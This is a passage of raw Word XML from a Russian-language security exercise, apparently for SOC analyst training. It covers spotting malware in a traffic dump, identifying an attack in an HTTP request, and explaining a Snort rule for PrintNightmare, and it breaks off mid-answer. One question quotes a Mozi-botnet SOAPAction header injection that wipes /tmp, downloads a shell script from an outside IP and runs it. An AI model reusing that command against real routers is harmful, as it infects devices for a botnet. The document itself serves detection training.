        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Вы зафиксировали подозрительный файл в дампе анализируемого сетевого трафика. Каким образом вы можете определить, является ли данный файл вредоносным программным обеспечением или нет?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F6D421" w14:textId="5CAB8579" w:rsidR="00820298" w:rsidRDefault="00820298" w:rsidP="00820298">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2C68AC" w14:textId="1B511EF8" w:rsidR="00820298" w:rsidRPr="00EE2789" w:rsidRDefault="00820298" w:rsidP="00820298">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Ответ</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2789">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121DC9CB" w14:textId="227D1B14" w:rsidR="00820298" w:rsidRDefault="00820298" w:rsidP="00820298">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE2789">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00820298">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Анализ паттернов трафика</w:t>
      </w:r>
      <w:r w:rsidRPr="00820298">
        <w:t>: Мониторинг сетевого трафика може</w:t>
      </w:r>
      <w:r>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="00820298">
        <w:t xml:space="preserve"> выявить необычные паттерны, такие как повышенная активность, необычные временные интервалы передачи данных, передача больших объемов данных на неизвестные адреса и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095A67AD" w14:textId="6BDF8BC6" w:rsidR="00820298" w:rsidRDefault="00820298" w:rsidP="00820298">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00820298">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Хеширование файла</w:t>
      </w:r>
      <w:r w:rsidRPr="00820298">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Можно </w:t>
      </w:r>
      <w:r w:rsidRPr="00820298">
        <w:t>взять хеш-сумму файла (например, MD5, SHA1, SHA256) и сравнить её с базами данных известных вирусных хеш-сум</w:t>
      </w:r>
      <w:r>
        <w:t>м, используя онлайн сервисы, например,</w:t>
      </w:r>
      <w:r w:rsidRPr="00820298">
        <w:t xml:space="preserve"> VirusTotal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A020BA9" w14:textId="11AEE149" w:rsidR="00820298" w:rsidRDefault="00820298" w:rsidP="00820298">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00820298">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Статический</w:t>
      </w:r>
      <w:r w:rsidR="00085641">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/динамический</w:t>
      </w:r>
      <w:r w:rsidRPr="00820298">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> анализ</w:t>
      </w:r>
      <w:r w:rsidRPr="00820298">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>И</w:t>
      </w:r>
      <w:r w:rsidRPr="00820298">
        <w:t>зучить файл на предмет известных вредоносных сигнатур или подозрительных строк в его коде, используя статический анализаторы кода</w:t>
      </w:r>
      <w:r w:rsidR="00085641">
        <w:t>, или запустить файл в «песочнице»</w:t>
      </w:r>
      <w:r w:rsidR="00085641" w:rsidRPr="00085641">
        <w:t xml:space="preserve"> для наблюдения за его поведением</w:t>
      </w:r>
      <w:r w:rsidRPr="00820298">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D057479" w14:textId="44ADAD10" w:rsidR="00085641" w:rsidRDefault="00085641" w:rsidP="00820298">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00085641">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Анализ сетевых запросов:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Проверить точки</w:t>
      </w:r>
      <w:r w:rsidRPr="00085641">
        <w:t xml:space="preserve"> назначения сетевых запросов и </w:t>
      </w:r>
      <w:r>
        <w:t>доменные</w:t>
      </w:r>
      <w:r w:rsidRPr="00085641">
        <w:t xml:space="preserve"> имен</w:t>
      </w:r>
      <w:r>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="00085641">
        <w:t xml:space="preserve"> через списки доменов, ассоциированных с вредоносным ПО</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D51C19" w14:textId="09931900" w:rsidR="00085641" w:rsidRDefault="00085641" w:rsidP="00820298">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00085641">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Использование инструментов безопасности:</w:t>
      </w:r>
      <w:r w:rsidRPr="00085641">
        <w:t xml:space="preserve"> Комплексное использование IDS/IPS систем, антивирусного ПО и сетевых сканеров уязвимостей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B32BCA2" w14:textId="7F835DA1" w:rsidR="00085641" w:rsidRPr="00085641" w:rsidRDefault="00085641" w:rsidP="00820298">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>######################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A85CC2" w14:textId="77777777" w:rsidR="00E230DA" w:rsidRDefault="00E230DA" w:rsidP="00E230DA">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19FB4A62" w14:textId="77777777" w:rsidR="00E230DA" w:rsidRDefault="00E230DA" w:rsidP="00E230DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF5BDA">
        <w:t>Какую угрозу ИБ представляет собой выполнение данного запроса?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58614527" w14:textId="77777777" w:rsidR="00DF5BDA" w:rsidRPr="00DF5BDA" w:rsidRDefault="00DF5BDA" w:rsidP="00DF5BDA">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A6C1CF" w14:textId="77777777" w:rsidR="00DF5BDA" w:rsidRPr="00B96336" w:rsidRDefault="00DF5BDA" w:rsidP="00DF5BDA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B96336">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET /index.html HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6665F777" w14:textId="77777777" w:rsidR="00DF5BDA" w:rsidRPr="00B96336" w:rsidRDefault="00DF5BDA" w:rsidP="00DF5BDA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B96336">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Host: site.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D38531" w14:textId="77777777" w:rsidR="00DF5BDA" w:rsidRPr="00B96336" w:rsidRDefault="00DF5BDA" w:rsidP="00DF5BDA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B96336">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Content-Type: text/xml; charset="utf-8"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA99764" w14:textId="77777777" w:rsidR="00DF5BDA" w:rsidRPr="00B96336" w:rsidRDefault="00DF5BDA" w:rsidP="00DF5BDA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B96336">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOAPAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B96336">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: http://purenetworks.com/HNAP1/`cd /tmp &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B96336">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B96336">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B96336">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B96336">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> * &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B96336">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B96336">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://***.***.***.***:56680/Mozi.sh &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B96336">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B96336">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 777 /tmp/Mozi.sh &amp;&amp; /tmp/Mozi.sh`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E21DB6D" w14:textId="77777777" w:rsidR="005E17D5" w:rsidRPr="00DF5BDA" w:rsidRDefault="00DF5BDA" w:rsidP="00DF5BDA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B96336">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Content-Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B96336">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: 640</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203E76F1" w14:textId="354E5651" w:rsidR="00E41E0E" w:rsidRDefault="00E41E0E" w:rsidP="00E41E0E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19522DA1" w14:textId="0A2B7CCD" w:rsidR="00E41E0E" w:rsidRPr="00EE2789" w:rsidRDefault="00E41E0E" w:rsidP="00E41E0E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Ответ</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2789">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415F7447" w14:textId="081DEB06" w:rsidR="00E41E0E" w:rsidRDefault="00E41E0E" w:rsidP="00E41E0E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2789">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Данный запрос содержит</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41E0E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>RCE.</w:t>
      </w:r>
      <w:r w:rsidR="00376E85">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Эта атака является серьёзной угрозой, потому что позволяет злоумышленнику выполнять произвольные команды на машине жертвы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199769D4" w14:textId="77777777" w:rsidR="00C842BB" w:rsidRDefault="00376E85" w:rsidP="00E41E0E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
        <w:t>В этом запросе злоумышленник переходит во временную папку «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00376E85">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">и выполняет удаление всех файлов без подтверждения в этой папке. Затем он скачивает какой-то скрипт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mozi</w:t>
      </w:r>
      <w:r w:rsidRPr="00376E85">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>, выдаёт ему все права для всех (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rwxrwxrwx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00376E85">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>и запускает его.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472ADD06" w14:textId="1FFC7B52" w:rsidR="00E41E0E" w:rsidRDefault="00C842BB" w:rsidP="00E41E0E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>######################################################################</w:t>
      </w:r>
      <w:r w:rsidR="00376E85">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B727761" w14:textId="77777777" w:rsidR="00376E85" w:rsidRPr="00E41E0E" w:rsidRDefault="00376E85" w:rsidP="00E41E0E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274E90EB" w14:textId="77777777" w:rsidR="00DF5BDA" w:rsidRPr="00DF5BDA" w:rsidRDefault="00DF5BDA" w:rsidP="00DF5BDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF5BDA">
        <w:t xml:space="preserve">Проанализируйте правило </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF5BDA">
        <w:t>Snort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF5BDA">
        <w:t xml:space="preserve"> и объясните в чем заключается его суть и каковы условия его срабатывания.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1A4591" w14:textId="77777777" w:rsidR="00DF5BDA" w:rsidRDefault="00DF5BDA" w:rsidP="00DF5BDA"/>
    <w:p w14:paraId="1B41F271" w14:textId="144E05BE" w:rsidR="000563EA" w:rsidRPr="000563EA" w:rsidRDefault="000563EA" w:rsidP="0005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4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">alert tcp any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; $HOME_NET [139,445] (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msg:"EXPLOIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Possible Microsoft Windows Spooler Service RCE aka '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PrintNightmare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 (CVE-2021-34527)"; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flow:established,to_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; content:"|00|"; depth:1; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>content:"SMB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"; distance:4; within:3; content:"|00 00|"; distance:0; content:"|10 00 00 00|"; distance:1; within:4; content:"|59 00|"; reference:cve,2021-34527; sid:3243816; rev:1; metadata: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>affected_asset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>affected_os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows,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microsoft:windows_10,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microsoft:windows_7,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microsoft:windows_8.1,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microsoft:windows_rt_8.1,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microsoft:windows_server_2008,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microsoft:windows_server_2012,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microsoft:windows_server_2016, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>affected_product</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> microsoft:windows_server_2019, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>affected_vendor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attack_target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Client_and_Server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000563EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, tag T1190, category Exploitation;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B85B04" w14:textId="77777777" w:rsidR="000563EA" w:rsidRPr="00B96336" w:rsidRDefault="000563EA" w:rsidP="00DF5BDA">
      <w:pPr>
        <w:pStyle w:val="Textbody"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="721B1C9D" w14:textId="71B57C28" w:rsidR="00DF5BDA" w:rsidRPr="00EE2789" w:rsidRDefault="00D31136" w:rsidP="00D31136">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Ответ</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2789">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A68F41B" w14:textId="61FAEB83" w:rsidR="00D31136" w:rsidRDefault="00D31136" w:rsidP="00D31136">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE2789">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Это правило предназначено </w:t>
      </w:r>
      <w:r w:rsidRPr="00D31136">
        <w:t xml:space="preserve">для обнаружения эксплуатации уязвимости </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">«PrintNightmare», которая заключается в выполнении </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00D31136">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>злоумышленник</w:t>
      </w:r>
      <w:r w:rsidRPr="00D31136">
        <w:t xml:space="preserve"> с правами обычного пользователя может применить специально созданный вредоносный DLL-файл, чтобы запустить эксплойт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Он может </w:t>
      </w:r>
      <w:r w:rsidRPr="00D31136">
        <w:t xml:space="preserve">использовать </w:t>
      </w:r>
      <w:r>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00D31136">
        <w:t>PrintNightmare</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00D31136">
        <w:t xml:space="preserve"> для доступа к данным, хранящимся</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в корпоративной инфраструктуре</w:t>
      </w:r>
      <w:r w:rsidRPr="00D31136">
        <w:t xml:space="preserve"> и для атак при помощи шифровальщиков-вымогателей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7229EECE" w14:textId="77777777" w:rsidR="00D31136" w:rsidRDefault="00D31136" w:rsidP="00D31136">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2254DF33" w14:textId="77777777" w:rsidR="0023253E" w:rsidRDefault="00D31136" w:rsidP="00D31136">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Правило </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Snort</w:t>
      </w:r>
      <w:r w:rsidRPr="00D31136">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>генерирует предупреждение</w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msg</w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7">
        <w:t>: «</w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
